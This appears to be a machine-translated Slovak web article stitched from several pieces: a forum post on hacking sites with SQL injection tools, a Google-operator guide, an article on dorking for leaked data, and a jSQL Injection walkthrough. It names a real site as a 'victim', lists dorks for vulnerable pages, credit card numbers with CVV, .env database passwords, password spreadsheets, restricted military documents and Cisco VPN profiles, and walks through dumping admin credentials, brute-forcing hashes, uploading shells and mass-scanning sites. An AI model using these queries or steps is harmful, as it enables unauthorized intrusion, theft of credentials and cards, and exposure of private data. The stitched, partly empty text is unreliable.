Návod na používanie jSQL Injection, multifunkčného nástroja na vyhľadávanie a využívanie SQL injekcií v Kali Linuxe. Pomocou málo známych funkcií Google nájdete požadované php id komentára Inurl

A tak vám teraz poviem, ako niečo hacknúť bez špeciálnych znalostí. Hneď poviem, že z toho je malý úžitok, ale predsa.
Najprv musíte nájsť samotné stránky. Ak to chcete urobiť, prejdite na stránku google.com a vyhľadajte dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transscript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: offer.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:".php?id=1" inurl:".php?cat=1" inurl:".php?catid= 1" inurl:".php?num=1" inurl:".php?bid=1" inurl:".php?pid=1" inurl:".php?nid=1"

tu je malý zoznam. Môžete použiť svoje. A tak sme našli stránku. Napríklad http://www.vestitambov.ru/
Ďalej si stiahnite tento program

**Skrytý obsah: Ak chcete vidieť tento skrytý obsah, počet vašich príspevkov musí byť 3 alebo vyšší.**

Kliknite na tlačidlo OK. Potom vložíme miesto obete.
Stlačíme štart. Ďalej čakáme na výsledky.
A tak program našiel zraniteľnosť SQL.

Ďalej si stiahnite Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= vložte tam prijatý odkaz. Nebudem vysvetľovať, ako používať Havij a kde ho stiahnuť; Všetky. Dostali ste údaje, ktoré potrebujete – heslo správcu, a potom je to už len na vašej fantázii.

P.S. Toto je môj prvý pokus niečo napísať. Ospravedlňujeme sa, ak niečo nie je v poriadku

Ako správne hľadať pomocou google.com

Každý asi vie, ako používať vyhľadávač ako Google =) Nie každý však vie, že ak správne zostavíte vyhľadávací dopyt pomocou špeciálnych konštrukcií, môžete dosiahnuť výsledky toho, čo hľadáte, oveľa efektívnejšie a rýchlejšie =) V tomto článku Pokúsim sa vám to ukázať a čo musíte urobiť, aby ste správne hľadali

Google podporuje niekoľko pokročilých operátorov vyhľadávania, ktoré majú špeciálny význam pri vyhľadávaní na google.com. Tieto vyhlásenia zvyčajne zmenia vyhľadávanie alebo dokonca prikazujú spoločnosti Google vykonávať úplne iné typy vyhľadávania. Napríklad odkaz: konštrukcia je špeciálny operátor a požiadavka link: www.google.com vám neposkytne normálne vyhľadávanie, ale namiesto toho nájde všetky webové stránky, ktoré majú odkazy na google.com.
alternatívne typy žiadostí

cache: Ak do dopytu zahrniete iné slová, Google zvýrazní tieto zahrnuté slová v dokumente vo vyrovnávacej pamäti.
Napríklad, cache: www.webova stranka zobrazí obsah uložený vo vyrovnávacej pamäti so zvýrazneným slovom „web“.

odkaz: Vyhľadávací dopyt uvedený vyššie zobrazí webové stránky, ktoré obsahujú odkazy na zadaný dopyt.
Napríklad: odkaz: www.stránka zobrazí všetky stránky, ktoré majú odkaz na http://www.site

súvisiace: Zobrazuje webové stránky, ktoré „súvisia“ so zadanou webovou stránkou.
Napríklad, súvisiace: www.google.com zobrazí zoznam webových stránok, ktoré sú podobné domovskej stránke Google.

info: Vyžiadať informácie: zobrazí niektoré informácie, ktoré má Google o webovej stránke, ktorú požadujete.
Napríklad, info: webstránka zobrazí informácie o našom fóre =) (Armada - Fórum pre dospelých webmasterov).

Ďalšie žiadosti o informácie

define: Dotaz define: poskytne definíciu slov, ktoré za ním zadáte, zozbieraných z rôznych online zdrojov. Definícia bude pre celú zadanú frázu (to znamená, že bude zahŕňať všetky slová v presnom dopyte).

akcie: Ak začnete dopyt s akciami: Google spracuje zvyšok dopytových výrazov ako symboly akcií a prepojí sa na stránku zobrazujúcu hotové informácie pre tieto symboly.
Napríklad, akcie: Intel yahoo zobrazí informácie o Intel a Yahoo. (Upozorňujeme, že by ste mali zadať symboly mimoriadnych správ, nie názov spoločnosti)

Modifikátory dopytov

site: Ak do svojho dopytu zahrniete site:, Google obmedzí výsledky na tie webové stránky, ktoré nájde v danej doméne.
Môžete tiež vyhľadávať podľa jednotlivých zón, ako je ru, org, com atď ( site:com site:ru)

allintitle: Ak spustíte dopyt s allintitle:, Google obmedzí výsledky na všetky slová dopytu v názve.
Napríklad, allintitle: vyhľadávanie google vráti všetky stránky Google podľa vyhľadávania, ako sú obrázky, blog atď

intitle: Ak vo svojom dopyte zahrniete intitle:, Google obmedzí výsledky na dokumenty obsahujúce toto slovo v názve.
Napríklad, intitle:Obchod

allinurl: Ak spustíte dopyt s allinurl: Google obmedzí výsledky na všetky slová dopytu v adrese URL.
Napríklad, allinurl: vyhľadávanie Google vráti dokumenty pomocou google a vyhľadávania v názve. Prípadne môžete slová oddeliť lomkou (/), potom sa slová na oboch stranách lomky budú hľadať na tej istej stránke: Príklad allinurl: foo/bar

inurl: Ak vo svojom dopyte zahrniete inurl:, Google obmedzí výsledky na dokumenty obsahujúce toto slovo v adrese URL.
Napríklad, Animácia inurl:site

intext: hľadá len zadané slovo v texte stránky, ignoruje nadpisy a texty odkazov a ďalšie veci, ktoré s tým nesúvisia. Existuje aj derivát tohto modifikátora - allintext: t.j. ďalej sa všetky slová v dopyte budú hľadať iba v texte, čo môže byť tiež dôležité, ignorujúc často používané slová v odkazoch
Napríklad, intext:forum

daterange: vyhľadávanie v rámci časového rámca (daterange:2452389-2452389), dátumy pre časy sú v juliánskom formáte.

No a všetky druhy zaujímavých príkladov dotazov

Príklady písania dopytov pre Google. Pre spamerov

Inurl:control.guest?a=sign

Site:books.dreambook.com „Adresa URL domovskej stránky“ „Podpísať“ inurl:sign

Stránka: www.freegb.net Domovská stránka

Inurl:sign.asp “Počet znakov”

“Správa:” inurl:sign.cfm “Odosielateľ:”

Inurl:register.php „Registrácia používateľa“ „Webová stránka“

Inurl:edu/guestbook “Zapíšte sa do knihy návštev”

Inurl:post “Uverejniť komentár” “URL”

Inurl:/archives/ “Komentáre:” “Pamätať si info?”

“Scenár a knihu návštev vytvoril:” “URL:” “Komentáre:”

Inurl:?action=add “phpBook” “URL”

Intitle: "Odoslať nový príbeh"

Časopisy

Inurl:www.livejournal.com/users/ mode=reply

Inurl greatjournal.com/ mode=reply

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? "Kniha návštev"

Blogy

Inurl:blogger.com/comment.g?”postID””anonymné”

Inurl:typepad.com/ “Pridať komentár” “Pamätať si osobné informácie?”

Inurl:greatestjournal.com/community/ “Uverejniť komentár” “adresy anonymných plagátov”

"Uverejniť komentár" "adresy anonymných plagátov" -

Intitle: "Uverejniť komentár"

Inurl:pirillo.com “Uverejniť komentár”

fóra

Inurl:gate.html?”name=Forums” “mode=reply”

Inurl:”forum/posting.php?mode=reply”

Inurl:"mes.php?"

Inurl:”members.html”

Inurl:forum/memberlist.php?“

Získanie súkromných údajov nemusí vždy znamenať hacknutie – niekedy sú zverejnené aj verejne. Znalosť nastavení Google a trocha vynaliezavosti vám umožní nájsť veľa zaujímavých vecí – od čísel kreditných kariet až po dokumenty FBI.

UPOZORNENIE Všetky informácie sú poskytované len na informačné účely. Redakcia ani autor nezodpovedajú za prípadné škody spôsobené materiálmi tohto článku.

Dnes je všetko pripojené k internetu, s minimálnym záujmom o obmedzenie prístupu. Preto sa mnohé súkromné ​​údaje stávajú korisťou vyhľadávačov. Spider roboty sa už neobmedzujú len na webové stránky, ale indexujú všetok obsah dostupný na internete a neustále pridávajú neverejné informácie do svojich databáz. Zistiť tieto tajomstvá je jednoduché – stačí sa vedieť na ne opýtať.

Hľadajú sa súbory

V schopných rukách Google rýchlo nájde všetko, čo sa nenachádza na internete, napríklad osobné informácie a súbory na oficiálne použitie. Často sú skryté ako kľúč pod kobercom: neexistujú žiadne skutočné obmedzenia prístupu, údaje jednoducho ležia na zadnej strane stránky, kam nevedú žiadne odkazy. Štandardné webové rozhranie Google poskytuje len základné pokročilé nastavenia vyhľadávania, no aj tie budú postačovať.

Vyhľadávanie Google môžete obmedziť na konkrétny typ súboru pomocou dvoch operátorov: filetype a ext . Prvý určuje formát, ktorý vyhľadávač určil z názvu súboru, druhý určuje príponu súboru bez ohľadu na jeho interný obsah. Pri vyhľadávaní v oboch prípadoch stačí zadať príponu. Spočiatku bolo vhodné použiť operátor ext v prípadoch, keď súbor nemal špecifické vlastnosti formátu (napríklad na vyhľadávanie konfiguračných súborov ini a cfg, ktoré by mohli obsahovať čokoľvek). Teraz sa algoritmy Google zmenili a medzi operátormi nie je viditeľný rozdiel – vo väčšine prípadov sú výsledky rovnaké.


Filtrovanie výsledkov

Google predvolene hľadá slová a vo všeobecnosti akékoľvek zadané znaky vo všetkých súboroch na indexovaných stránkach. Oblasť vyhľadávania môžete obmedziť doménou najvyššej úrovne, špecifickou stránkou alebo umiestnením sekvencie vyhľadávania v samotných súboroch. Pre prvé dve možnosti použite operátor stránky, za ktorým nasleduje názov domény alebo vybranej stránky. V treťom prípade vám celý súbor operátorov umožňuje vyhľadávať informácie v poliach služieb a metadátach. Napríklad allinurl nájde daný v tele samotných odkazov, allinanchor - v texte vybavenom tagom , allintitle - v názvoch stránok, allintext - v tele stránok.

Pre každého operátora existuje odľahčená verzia s kratším názvom (bez predpony all). Rozdiel je v tom, že allinurl nájde odkazy so všetkými slovami a inurl nájde odkazy iba s prvým z nich. Druhé a ďalšie slová z dopytu sa môžu objaviť kdekoľvek na webových stránkach. Operátor inurl sa tiež líši od iného operátora s podobným významom – site. Prvý tiež umožňuje nájsť ľubovoľnú sekvenciu znakov v odkaze na hľadaný dokument (napríklad /cgi-bin/), čo sa široko používa na nájdenie komponentov so známymi zraniteľnosťami.

Skúsme to v praxi. Vezmeme allintextový filter a zo žiadosti vytvoríme zoznam čísel a overovacích kódov kreditných kariet, ktorých platnosť vyprší až o dva roky (alebo keď ich majiteľov omrzí kŕmiť všetkých).

Allintext: číslo karty dátum vypršania platnosti /2017 cvv

Keď sa v správach dočítate, že sa mladý hacker „nabúral na servery“ Pentagonu alebo NASA, pričom kradol utajované informácie, vo väčšine prípadov hovoríme práve o takejto základnej technike používania Google. Predpokladajme, že nás zaujíma zoznam zamestnancov NASA a ich kontaktné informácie. Takýto zoznam je určite dostupný aj v elektronickej podobe. Pre pohodlie alebo kvôli prehliadnutiu môže byť aj na samotnej webovej stránke organizácie. Je logické, že v tomto prípade naň nebudú žiadne odkazy, keďže je určený na interné použitie. Aké slová môžu byť v takomto súbore? Minimálne - pole „adresa“. Testovanie všetkých týchto predpokladov je jednoduché.


Inurl:nasa.gov filetype:xlsx "adresa"


Využívame byrokraciu

Takéto nálezy sú príjemnou záležitosťou. Skutočne solídny úlovok poskytuje detailnejšia znalosť operátorov Google pre webmasterov, samotnej Siete a zvláštností štruktúry hľadaného. Ak poznáte podrobnosti, môžete ľahko filtrovať výsledky a spresniť vlastnosti potrebných súborov, aby ste vo zvyšku získali skutočne cenné údaje. Je smiešne, že byrokracia tu prichádza na pomoc. Vytvára štandardné formulácie, ktoré sú vhodné na vyhľadávanie tajných informácií, ktoré náhodne unikli na internet.

Napríklad pečiatka vyhlásenia o distribúcii, ktorú vyžaduje ministerstvo obrany USA, znamená štandardizované obmedzenia distribúcie dokumentu. Písmeno A označuje verejné správy, v ktorých nie je nič tajné; B - určené len na interné použitie, C - prísne dôverné a tak ďalej až do F. Samostatne vyniká písmeno X, ktoré označuje obzvlášť cenné informácie predstavujúce štátne tajomstvo najvyššej úrovne. Nechajte tých, ktorí to majú robiť v službe, hľadajú takéto dokumenty a my sa obmedzíme na súbory s písmenom C. Podľa smernice DoDI 5230.24 je toto označenie priradené dokumentom obsahujúcim popis kritických technológií, ktoré spadajú pod kontrolu exportu . Takéto starostlivo chránené informácie môžete nájsť na stránkach najvyššej úrovne domény.mil, pridelenej americkej armáde.

"VÝKAZ DISTRIBÚCIE C" inurl:navy.mil

Je veľmi výhodné, že doména .mil obsahuje iba stránky Ministerstva obrany USA a jeho zmluvných organizácií. Výsledky vyhľadávania s obmedzením domény sú mimoriadne čisté a názvy hovoria samy za seba. Hľadanie ruských tajomstiev týmto spôsobom je prakticky zbytočné: v doménach.ru a.rf vládne chaos a názvy mnohých zbraňových systémov znejú ako botanické (PP „Kiparis“, samohybné delá „Akatsia“) alebo dokonca báječné ( TOS „Buratino“).


Pozorným preštudovaním akéhokoľvek dokumentu z lokality v doméne .mil môžete vidieť ďalšie značky na spresnenie vyhľadávania. Napríklad odkaz na exportné obmedzenia „Sec 2751“, ktorý je vhodný aj na vyhľadávanie zaujímavých technických informácií. Z času na čas je odstránený z oficiálnych stránok, kde sa kedysi objavil, takže ak nemôžete sledovať zaujímavý odkaz vo výsledkoch vyhľadávania, použite vyrovnávaciu pamäť Google (operátor vyrovnávacej pamäte) alebo stránku Internet Archive.

Stúpanie do oblakov

Okrem náhodne odtajnených vládnych dokumentov sa vo vyrovnávacej pamäti Google občas objavia aj odkazy na osobné súbory z Dropboxu a iných služieb na ukladanie údajov, ktoré vytvárajú „súkromné“ odkazy na verejne publikované údaje. Ešte horšie je to s alternatívnymi a domácimi službami. Napríklad nasledujúci dotaz nájde údaje pre všetkých zákazníkov spoločnosti Verizon, ktorí majú nainštalovaný server FTP a aktívne používajú svoj smerovač.

Allinurl:ftp:// verizon.net

Takýchto šikovných ľudí je teraz viac ako štyridsaťtisíc a na jar 2015 ich bolo oveľa viac. Namiesto Verizon.net môžete nahradiť meno ktoréhokoľvek známeho poskytovateľa a čím je slávnejší, tým väčší môže byť úlovok. Prostredníctvom vstavaného servera FTP môžete vidieť súbory na externom úložnom zariadení pripojenom k ​​smerovaču. Zvyčajne ide o NAS na prácu na diaľku, osobný cloud alebo nejaký druh sťahovania súborov typu peer-to-peer. Všetok obsah takýchto médií je indexovaný spoločnosťou Google a inými vyhľadávacími nástrojmi, takže k súborom uloženým na externých diskoch máte prístup prostredníctvom priameho odkazu.

Pri pohľade na konfigurácie

Pred rozšírenou migráciou do cloudu vládli ako vzdialené úložisko jednoduché FTP servery, ktoré mali tiež veľa zraniteľností. Mnohé z nich sú aktuálne aj dnes. Napríklad populárny program WS_FTP Professional ukladá konfiguračné údaje, používateľské účty a heslá do súboru ws_ftp.ini. Je ľahké ho nájsť a prečítať, pretože všetky záznamy sú uložené v textovom formáte a heslá sú po minimálnom zmätku šifrované pomocou algoritmu Triple DES. Vo väčšine verzií stačí zahodiť prvý bajt.

Takéto heslá je ľahké dešifrovať pomocou nástroja WS_FTP Password Decryptor alebo bezplatnej webovej služby.

Keď hovoríme o hacknutí ľubovoľnej webovej stránky, zvyčajne majú na mysli získanie hesla z protokolov a záloh konfiguračných súborov CMS alebo aplikácií elektronického obchodu. Ak poznáte ich typickú štruktúru, môžete ľahko uviesť kľúčové slová. Riadky ako tie, ktoré sa nachádzajú v ws_ftp.ini, sú extrémne bežné. Napríklad v Drupale a PrestaShope je vždy identifikátor používateľa (UID) a príslušné heslo (pwd) a všetky informácie sú uložené v súboroch s príponou .inc. Môžete ich vyhľadať nasledovne:

"pwd=" "UID=" ext:inc

Odhalenie hesiel DBMS

V konfiguračných súboroch serverov SQL sú mená používateľov a e-mailové adresy uložené ako čistý text a namiesto hesiel sú zapísané ich MD5 hash. Presne povedané, nie je možné ich dešifrovať, ale môžete nájsť zhodu medzi známymi pármi hash-heslo.

Stále existujú DBMS, ktoré ani nepoužívajú hashovanie hesiel. Konfiguračné súbory ktoréhokoľvek z nich je možné jednoducho zobraziť v prehliadači.

Intext:DB_PASSWORD filetype:env

S príchodom Windows serverov miesto konfiguračných súborov čiastočne zabral register. Presne rovnakým spôsobom môžete prehľadávať jeho vetvy, pričom ako typ súboru použijete reg. Napríklad takto:

Filetype:reg HKEY_CURRENT_USER "Heslo"=

Nezabúdajme na samozrejmé

Niekedy je možné dostať sa k utajovaným informáciám pomocou údajov, ktoré boli náhodne otvorené a dostali sa do pozornosti Googlu. Ideálnou možnosťou je nájsť si zoznam hesiel v nejakom bežnom formáte. Do textového súboru, wordového dokumentu alebo excelovskej tabuľky si informácie o účte môžu uložiť len zúfalci, no tých je vždy dosť.

Filetype:xls inurl:password

Na jednej strane existuje množstvo prostriedkov, ako takýmto incidentom predchádzať. Je potrebné špecifikovať adekvátne prístupové práva v htaccess, patchnúť CMS, nepoužívať ľavoruké skripty a zalepiť ostatné diery. Existuje aj súbor so zoznamom výnimiek robots.txt, ktorý vyhľadávacím nástrojom zakazuje indexovať súbory a adresáre v ňom uvedené. Na druhej strane, ak sa štruktúra robots.txt na niektorom serveri líši od štandardnej, hneď je jasné, čo sa na ňom snažia ukryť.

Zoznamu adresárov a súborov na ľubovoľnej stránke predchádza štandardný index. Keďže sa na účely služby musí objaviť v názve, má zmysel obmedziť jeho vyhľadávanie na operátora intitle. Zaujímavé veci sú v adresároch /admin/, /personal/, /etc/ a dokonca aj /secret/.

Zostaňte naladení na aktualizácie

Relevancia je tu mimoriadne dôležitá: staré zraniteľnosti sa uzatvárajú veľmi pomaly, ale Google a jeho výsledky vyhľadávania sa neustále menia. Existuje dokonca rozdiel medzi filtrom „poslednej sekundy“ (&tbs=qdr:s na konci adresy URL požiadavky) a filtrom „v reálnom čase“ (&tbs=qdr:1).

Časový interval dátumu poslednej aktualizácie súboru implicitne uvádza aj Google. Cez grafické webové rozhranie si môžete vybrať jedno zo štandardných období (hodina, deň, týždeň atď.) alebo nastaviť rozsah dátumov, tento spôsob však nie je vhodný pre automatizáciu.

Podľa vzhľadu panela s adresou môžete len hádať o spôsobe, ako obmedziť výstup výsledkov pomocou konštrukcie &tbs=qdr:. Písmeno y za ním určuje hranicu jedného roka (&tbs=qdr:y), m zobrazuje výsledky za posledný mesiac, w - za týždeň, d - za posledný deň, h - za poslednú hodinu, n - za minútu a s - za daj mi sek. Najnovšie výsledky, ktoré spoločnosť Google práve oznámila, sa dajú nájsť pomocou filtra &tbs=qdr:1 .

Ak potrebujete napísať šikovný skript, bude užitočné vedieť, že rozsah dátumov sa v Google nastavuje v juliánskom formáte pomocou operátora daterange. Takto môžete napríklad nájsť zoznam PDF dokumentov so slovom dôverné, stiahnutý od 1. januára do 1. júla 2015.

Dôverný typ súboru: pdf rozsah dátumov: 2457024-2457205

Rozsah je uvedený vo formáte juliánskeho dátumu bez zohľadnenia zlomkovej časti. Ručný preklad z gregoriánskeho kalendára je nepohodlný. Jednoduchšie je použiť konvertor dátumu.

Opäť zacielenie a filtrovanie

Okrem zadania ďalších operátorov vo vyhľadávacom dopyte ich možno odoslať priamo v tele odkazu. Napríklad špecifikácia filetype:pdf zodpovedá konštrukcii as_filetype=pdf . Vďaka tomu je pohodlné pýtať sa na akékoľvek vysvetlenie. Povedzme, že výstup výsledkov len z Honduraskej republiky je špecifikovaný pridaním konštrukcie cr=countryHN do URL vyhľadávania a len z mesta Bobruisk - gcs=Bobruisk. Kompletný zoznam nájdete v sekcii pre vývojárov.

Automatizačné nástroje Google sú navrhnuté tak, aby uľahčili život, no často prinášajú problémy. Napríklad mesto používateľa je určené IP adresou používateľa prostredníctvom WHOIS. Na základe týchto informácií Google nielen vyrovnáva záťaž medzi servermi, ale mení aj výsledky vyhľadávania. V závislosti od regiónu sa pre tú istú požiadavku zobrazia na prvej stránke rôzne výsledky a niektoré z nich môžu byť úplne skryté. Dvojpísmenový kód za direktívou gl=country vám pomôže cítiť sa ako kozmopolita a vyhľadávať informácie z ktorejkoľvek krajiny. Napríklad kód Holandska je NL, ale Vatikán a Severná Kórea nemajú v Google vlastný kód.

Výsledky vyhľadávania sú často neprehľadné aj po použití niekoľkých pokročilých filtrov. V tomto prípade je ľahké objasniť požiadavku pridaním niekoľkých výnimočných slov (pred každým z nich je umiestnené znamienko mínus). Napríklad bankovníctvo, mená a návody sa často používajú so slovom Osobné. Čistejšie výsledky vyhľadávania sa preto ukážu nie ako učebnicový príklad dopytu, ale spresnený:

Intitle:"Index /Personal/" -mená -náuka -banking

Posledný príklad

Sofistikovaný hacker sa vyznačuje tým, že si všetko potrebné zabezpečí sám. Napríklad VPN je pohodlná vec, ale buď drahá, alebo dočasná a s obmedzeniami. Prihlásiť sa na odber pre seba je príliš drahé. Je dobré, že existujú skupinové odbery a s pomocou Google je ľahké stať sa súčasťou skupiny. Ak to chcete urobiť, stačí nájsť konfiguračný súbor Cisco VPN, ktorý má dosť neštandardnú príponu PCF a rozpoznateľnú cestu: Program Files\Cisco Systems\VPN Client\Profiles. Jedna žiadosť a pripojíte sa napríklad k priateľskému tímu univerzity v Bonne.

Filetype:pcf vpn OR Group

INFO Google nájde konfiguračné súbory s heslami, no mnohé z nich sú napísané v zašifrovanej forme alebo nahradené hashmi. Ak vidíte reťazce pevnej dĺžky, okamžite vyhľadajte službu dešifrovania.

Heslá sú uložené zašifrované, ale Maurice Massard už napísal program na ich dešifrovanie a poskytuje ho zadarmo cez thecampusgeeks.com.

Google vykonáva stovky rôznych typov útokov a penetračných testov. Existuje veľa možností, ktoré ovplyvňujú populárne programy, hlavné databázové formáty, početné zraniteľnosti PHP, cloudy atď. Ak budete presne vedieť, čo hľadáte, bude oveľa jednoduchšie nájsť potrebné informácie (najmä informácie, ktoré ste nechceli zverejniť). Zaujímavými nápadmi sa živí nielen Shodan, ale každá databáza indexovaných sieťových zdrojov!

Spustite stiahnutý súbor dvojitým kliknutím (potrebujete mať virtuálny stroj).

3. Anonymita pri kontrole stránky pre SQL injection
Nastavenie Tor a Privoxy v Kali Linuxe

[Sekcia vo vývoji]

Nastavenie Tor a Privoxy v systéme Windows

[Sekcia vo vývoji]

Nastavenia proxy v jSQL Injection

[Sekcia vo vývoji]

4. Kontrola stránky pre SQL injection pomocou jSQL Injection

Práca s programom je mimoriadne jednoduchá. Stačí zadať adresu webovej stránky a stlačiť ENTER.

Nasledujúca snímka obrazovky ukazuje, že stránka je zraniteľná voči trom typom SQL injekcií (informácie o nich sú uvedené v pravom dolnom rohu). Kliknutím na názvy injekcií môžete prepínať použitú metódu:

Taktiež sa nám už zobrazili existujúce databázy.

Obsah každej tabuľky si môžete pozrieť:

Najzaujímavejšou vecou na tabuľkách sú zvyčajne poverenia správcu.

Ak máte šťastie a nájdete údaje správcu, je priskoro na radosť. Stále musíte nájsť admin panel, kam zadať tieto údaje.

5. Hľadajte admin panely pomocou jSQL Injection

Ak to chcete urobiť, prejdite na ďalšiu kartu. Tu nás privíta zoznam možných adries. Na kontrolu môžete vybrať jednu alebo viac stránok:

Pohodlie spočíva v tom, že nemusíte používať ďalšie programy.

Bohužiaľ, nie je veľa neopatrných programátorov, ktorí ukladajú heslá v čistom texte. Pomerne často v riadku hesla vidíme niečo ako

8743b52063cd84097a65d1633f5c74f5

Toto je hash. Môžete ho dešifrovať pomocou hrubej sily. A... jSQL Injection má vstavaný brute force.

6. Hrubá sila hash pomocou jSQL Injection

Nepochybným pohodlím je, že nemusíte hľadať ďalšie programy. Existuje podpora pre mnohé z najpopulárnejších hashov.

Toto nie je najlepšia možnosť. Aby ste sa stali guruom v dekódovaní hashov, odporúča sa kniha „“ v ruštine.

Ale samozrejme, keď nie je po ruke iný program alebo nie je čas na štúdium, veľmi vhod príde jSQL Injection so vstavanou funkciou hrubej sily.

Existujú nastavenia: môžete nastaviť, ktoré znaky sú zahrnuté v hesle, rozsah dĺžky hesla.

7. Operácie so súbormi po zistení injekcií SQL

Okrem operácií s databázami - ich čítanie a úprava, ak sa zistia injekcie SQL, možno vykonať nasledujúce operácie so súbormi:

  • čítanie súborov na serveri
  • nahrávanie nových súborov na server
  • nahrávanie shellov na server

A to všetko je implementované v jSQL Injection!

Existujú obmedzenia - server SQL musí mať práva na súbory. Správcovia inteligentného systému ich majú vypnuté a nebudú môcť získať prístup k súborovému systému.

Prítomnosť privilégií k súborom sa kontroluje pomerne jednoducho. Prejdite na jednu zo záložiek (čítanie súborov, vytvorenie shellu, nahranie nového súboru) a skúste vykonať jednu zo zadaných operácií.

Ešte veľmi dôležitá poznámka – musíme poznať presnú absolútnu cestu k súboru, s ktorým budeme pracovať – inak nebude fungovať nič.

Pozrite si nasledujúcu snímku obrazovky:

Na akýkoľvek pokus o prácu so súborom dostaneme odpoveď: Žiadne privilégium FILE (žiadne privilégiá pre súbor). A tu sa nedá nič robiť.

Ak namiesto toho máte inú chybu:

Problém so zápisom do [názov_adresára]

To znamená, že ste nesprávne zadali absolútnu cestu, kam chcete súbor zapísať.

Aby ste uhádli absolútnu cestu, musíte aspoň poznať operačný systém, na ktorom server beží. Ak to chcete urobiť, prejdite na kartu Sieť.

Tento záznam (riadok Win64) nám dáva dôvod predpokladať, že ide o operačný systém Windows:

Keep-Alive: timeout=5, max=99 Server: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Pripojenie: Keep-Alive Metóda: HTTP/1.1 200 OK Obsah-Dĺžka: 353 Dátum: Pia, 11. december 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Content-Type: text/html; znaková sada=UTF-8

Tu máme nejaký Unix (*BSD, Linux):

Transfer-Encoding: chunked Dátum: Pi, 11 Dec 2015 11:57:02 GMT Metóda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Connection: keep-alive Content-Type: text/html X- Poháňané: PHP/5.3.29 Server: Apache/2.2.31 (Unix)

A tu máme CentOS:

Metóda: HTTP/1.1 200 OK Vyprší: štvrtok, 19. novembra 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; path=/ Pripojenie: keep-alive X-Cache-Lookup: MISS z t1.hoster.ru:6666 Server: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS z t1.hoster.ru Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Date: Pi, 11 Dec 2015 12:08:54 GMT Transfer-Encoding: chunked Content-Type: text/html; charset=WINDOWS-1251

V systéme Windows je typický priečinok pre lokality C:\Server\data\htdocs\ . Ale v skutočnosti, ak niekto „uvažoval“ o vytvorení servera v systéme Windows, potom je veľmi pravdepodobné, že táto osoba nepočula nič o privilégiách. Preto by ste mali začať skúšať priamo z adresára C:/Windows/:

Ako vidíte, všetko prebehlo v poriadku na prvýkrát.

Ale samotné shelly jSQL Injection vyvolávajú v mojej mysli pochybnosti. Ak máte privilégiá k súborom, môžete jednoducho niečo nahrať pomocou webového rozhrania.

8. Hromadná kontrola stránok pre SQL injekcie

A dokonca aj táto funkcia je dostupná v jSQL Injection. Všetko je veľmi jednoduché - stiahnite si zoznam stránok (možno importovať zo súboru), vyberte tie, ktoré chcete skontrolovať, a kliknutím na príslušné tlačidlo spustite operáciu.

Záver z jSQL Injection

